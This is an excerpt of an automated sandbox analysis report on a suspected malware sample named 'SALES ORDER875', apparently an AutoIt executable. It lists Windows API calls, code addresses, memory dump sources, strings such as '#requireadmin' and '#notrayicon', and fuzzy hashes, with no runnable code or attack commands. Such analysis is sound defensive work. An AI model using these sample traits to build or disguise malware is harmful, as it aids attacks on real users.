                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                                    • String ID: 255.255.255.255
                                                                                                                                                                                    • API String ID: 946324512-2422070025
                                                                                                                                                                                    • Opcode ID: c68f977200ccca98b307d5ea590aea602ccfc467de02a11828e8ac3df2f190e0
                                                                                                                                                                                    • Instruction ID: 7337c0d37ae20867914d82b235451323514f969754b16b62b61f2edc0160338f
                                                                                                                                                                                    • Opcode Fuzzy Hash: c68f977200ccca98b307d5ea590aea602ccfc467de02a11828e8ac3df2f190e0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0531F5352002019FC710DF28C485EAA7BE8EF54319F2480AAE815AF3D2C73AEE41C765
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00414705
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00414713
                                                                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0041471A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                    • String ID: msctls_updown32
                                                                                                                                                                                    • API String ID: 4014797782-2298589950
                                                                                                                                                                                    • Opcode ID: 23ecbde124f1b90a9a81d2b280dbbde2e45c1a3986157ac16a21fc1f78741b26
                                                                                                                                                                                    • Instruction ID: d05fcf06bcb98db8651a65bc9d4167e14b08ccda5470ed001fe81f1ecec3c081
                                                                                                                                                                                    • Opcode Fuzzy Hash: 23ecbde124f1b90a9a81d2b280dbbde2e45c1a3986157ac16a21fc1f78741b26
                                                                                                                                                                                    • Instruction Fuzzy Hash: 012162B5600204AFDB11DF64DCC1DA737ADEB8A754B14005AF6109B3A1CB74EC51CB64
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                                                    • API String ID: 176396367-2734436370
                                                                                                                                                                                    • Opcode ID: 27556c50f5ce25f9c42876f3824be37b3a2c5b6abfbc8782869dca55ae1388f8
                                                                                                                                                                                    • Instruction ID: 76a7baab63ed0d9feef2c03af289c150857d8e2c7576617bcdb6f2cbecbc1168
                                                                                                                                                                                    • Opcode Fuzzy Hash: 27556c50f5ce25f9c42876f3824be37b3a2c5b6abfbc8782869dca55ae1388f8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 59213B722046A0A6C733BB269C02FBB739CDF92310F214527F9499B0C1EB55AD45C395
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00413840
                                                                                                                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00413850
                                                                                                                                                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00413876
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                                                                                                    • String ID: Listbox
                                                                                                                                                                                    • API String ID: 3315199576-2633736733
                                                                                                                                                                                    • Opcode ID: 6b52dab7ca5890ec8afc5b176df822abe00ca437bc286b536d37a28df0a7321c
                                                                                                                                                                                    • Instruction ID: e8a94e88aa94bb489d73c1aff58d5652d8b572a9c2ca58e887235c0ecb2fa590
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b52dab7ca5890ec8afc5b176df822abe00ca437bc286b536d37a28df0a7321c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8521D172600218BBEF219F54CC81FFB37AEEF89751F108125F9149B290CA75DC9287A4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 003F4A08
                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 003F4A5C
                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,0041CC08), ref: 003F4AD0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                    • String ID: %lu
                                                                                                                                                                                    • API String ID: 2507767853-685833217
                                                                                                                                                                                    • Opcode ID: c44b0b7cf33c245fc56c438558552886ba5c8297a7538d602897b3717183333b
                                                                                                                                                                                    • Instruction ID: be4a6588a64dbbab8a0ea0c0f4d7cb97dee2fc917e796ab9754606aadd0ec9c3
                                                                                                                                                                                    • Opcode Fuzzy Hash: c44b0b7cf33c245fc56c438558552886ba5c8297a7538d602897b3717183333b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 39317175A40209AFDB11DF54C885EAA7BF8EF09308F1480A9F909DF252D771ED45CB61
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0041424F
                                                                                                                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00414264
                                                                                                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00414271
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                    • String ID: msctls_trackbar32
                                                                                                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                                                                                                    • Opcode ID: 2369a1061d0e900322591453e234228a0845fda5eb8bb5a52167871b0a3e01fb
                                                                                                                                                                                    • Instruction ID: 849ec69c4e0bd0416f51a6090f9a39979238359b2c594a42e36d74597bbc69bf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2369a1061d0e900322591453e234228a0845fda5eb8bb5a52167871b0a3e01fb
                                                                                                                                                                                    • Instruction Fuzzy Hash: CF110631240208BEEF205F29CC06FEB3BACEFD5B64F110125FA55E61A0D275DC919B28
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00386B57: _wcslen.LIBCMT ref: 00386B6A
                                                                                                                                                                                      • Part of subcall function 003E2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 003E2DC5
                                                                                                                                                                                      • Part of subcall function 003E2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 003E2DD6
                                                                                                                                                                                      • Part of subcall function 003E2DA7: GetCurrentThreadId.KERNEL32 ref: 003E2DDD
                                                                                                                                                                                      • Part of subcall function 003E2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 003E2DE4
                                                                                                                                                                                    • GetFocus.USER32 ref: 003E2F78
                                                                                                                                                                                      • Part of subcall function 003E2DEE: GetParent.USER32(00000000), ref: 003E2DF9
                                                                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 003E2FC3
                                                                                                                                                                                    • EnumChildWindows.USER32(?,003E303B), ref: 003E2FEB
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                    • String ID: %s%d
                                                                                                                                                                                    • API String ID: 1272988791-1110647743
                                                                                                                                                                                    • Opcode ID: cf7f0b4fd1e193f68216093cfb223d87998368488b59364750be8e7ba0f53c1d
                                                                                                                                                                                    • Instruction ID: 8da3383cd5765ff925054bfcb7790bcd20491935f2e97962b32a47b8d5954712
                                                                                                                                                                                    • Opcode Fuzzy Hash: cf7f0b4fd1e193f68216093cfb223d87998368488b59364750be8e7ba0f53c1d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3011E1B16002556BCF027F758CDAFEE376AAF84304F048075FA099F292EE309D498B60
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 004158C1
                                                                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 004158EE
                                                                                                                                                                                    • DrawMenuBar.USER32(?), ref: 004158FD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                    • API String ID: 3227129158-4108050209
                                                                                                                                                                                    • Opcode ID: 8c5be5c5285c6798b53bfcd6168a7a7fee90f46b862f76dddcb5378a07aefb6d
                                                                                                                                                                                    • Instruction ID: 0a41af08d54a952bf8eef2bbad66a03f82484e1373ca101172f41d42a9b15a9e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c5be5c5285c6798b53bfcd6168a7a7fee90f46b862f76dddcb5378a07aefb6d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 51016171510218EFDB119F11DC44BEFBBB9FB85360F1080AAE849DA251DB348AC4DF26
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 003DD3BF
                                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 003DD3E5
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressFreeLibraryProc
                                                                                                                                                                                    • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                    • API String ID: 3013587201-2590602151
                                                                                                                                                                                    • Opcode ID: 05b8dcdf9cc5fa6b1f96df1944f8e1c53f9638849e8a58aab1da7eb4e3384e21
                                                                                                                                                                                    • Instruction ID: 04a4878ade230023403f1cea705c2bdce66844828150505b1dd8ccce934de43c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 05b8dcdf9cc5fa6b1f96df1944f8e1c53f9638849e8a58aab1da7eb4e3384e21
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DF0EC775C5511ABD73716105C94E997328AF10701B56C55BF807E1709D714CD844A9A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: f68baf1c8f498ccc1559fa54f06dee63dd45828a136f1ddeb90b81e33352b2b7
                                                                                                                                                                                    • Instruction ID: 26840f7f34ee40c94d18581dceaf380345eed0f2550a55cf590ca9fc85e3b23d
                                                                                                                                                                                    • Opcode Fuzzy Hash: f68baf1c8f498ccc1559fa54f06dee63dd45828a136f1ddeb90b81e33352b2b7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 53C17D75A0025AEFCB19CFA5C894AAEB7B5FF48304F118698E505EF291C771ED81CB90
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Variant$ClearInitInitializeUninitialize
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1998397398-0
                                                                                                                                                                                    • Opcode ID: a164006e0bab45c824012d91f30962612e2915fee4af206070d28ba6a9236cb8
                                                                                                                                                                                    • Instruction ID: e52ad7f0d98a5adfb3a2f5ec2e9dadcfc30f5431bcee8373acf67f5f3a98cb53
                                                                                                                                                                                    • Opcode Fuzzy Hash: a164006e0bab45c824012d91f30962612e2915fee4af206070d28ba6a9236cb8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AA16E752043009FC711EF28C485A2ABBE9FF89715F14885AF949AF3A2DB34ED01CB55
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0041FC08,?), ref: 003E05F0
                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0041FC08,?), ref: 003E0608
                                                                                                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,0041CC40,000000FF,?,00000000,00000800,00000000,?,0041FC08,?), ref: 003E062D
                                                                                                                                                                                    • _memcmp.LIBVCRUNTIME ref: 003E064E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 314563124-0
                                                                                                                                                                                    • Opcode ID: 8e2fc8fa4a045820a792300e960d39e90dce1368ba36f20a9b7656713ff97bfb
                                                                                                                                                                                    • Instruction ID: d66cd26220df120747892e59f574c382e3eb2cead3ce4871b387e799a45178fa
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e2fc8fa4a045820a792300e960d39e90dce1368ba36f20a9b7656713ff97bfb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D812D71A00119EFCB05DF94C984EEEB7B9FF89315F204598E506AB290DB71AE46CF60
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                    • Opcode ID: 69c537486c13090eb9a623212689f7775c0e6f0721d9b668fb31f3e4c90aa7ec
                                                                                                                                                                                    • Instruction ID: d1dd5a1b35cbd7d1ed2121517485ffff4472a8235a707bfd8f8bf3ff8ba39b9d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 69c537486c13090eb9a623212689f7775c0e6f0721d9b668fb31f3e4c90aa7ec
                                                                                                                                                                                    • Instruction Fuzzy Hash: 45413B35A00100ABDB2B6BFA8C45FAE3AB9EF43370F154629F519DA693E6344C417361
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetWindowRect.USER32(016DEE30,?), ref: 004162E2
                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00416315
                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00416382
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3880355969-0
                                                                                                                                                                                    • Opcode ID: c5c6498814affd71c9c25888c10ed310ec3d341d3f6366fa5e693230926d71bf
                                                                                                                                                                                    • Instruction ID: 280e88bc639493f0ed5955de0041dd836de27d723b4ad5925f560cfe1145761f
                                                                                                                                                                                    • Opcode Fuzzy Hash: c5c6498814affd71c9c25888c10ed310ec3d341d3f6366fa5e693230926d71bf
                                                                                                                                                                                    • Instruction Fuzzy Hash: EF510974A00209AFDB11DF68D880AEE7BB5EB45360F11816AF8259B3A1D774ED81CB54
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00401AFD
                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00401B0B
                                                                                                                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00401B8A
                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00401B94
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$socket
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1881357543-0
                                                                                                                                                                                    • Opcode ID: a4429938526d69b81f17b6c89b359cdebf6d29f9fa6db8549b42686d3d40e6c9
                                                                                                                                                                                    • Instruction ID: 50cd8340848bccc423199fa1c37f850f5424503c487629c4256ded6632e2c08a
                                                                                                                                                                                    • Opcode Fuzzy Hash: a4429938526d69b81f17b6c89b359cdebf6d29f9fa6db8549b42686d3d40e6c9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6541B034640300AFE721AF24C886F2A77E5AB44718F548499FA1A9F7D2D776ED41CB90
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
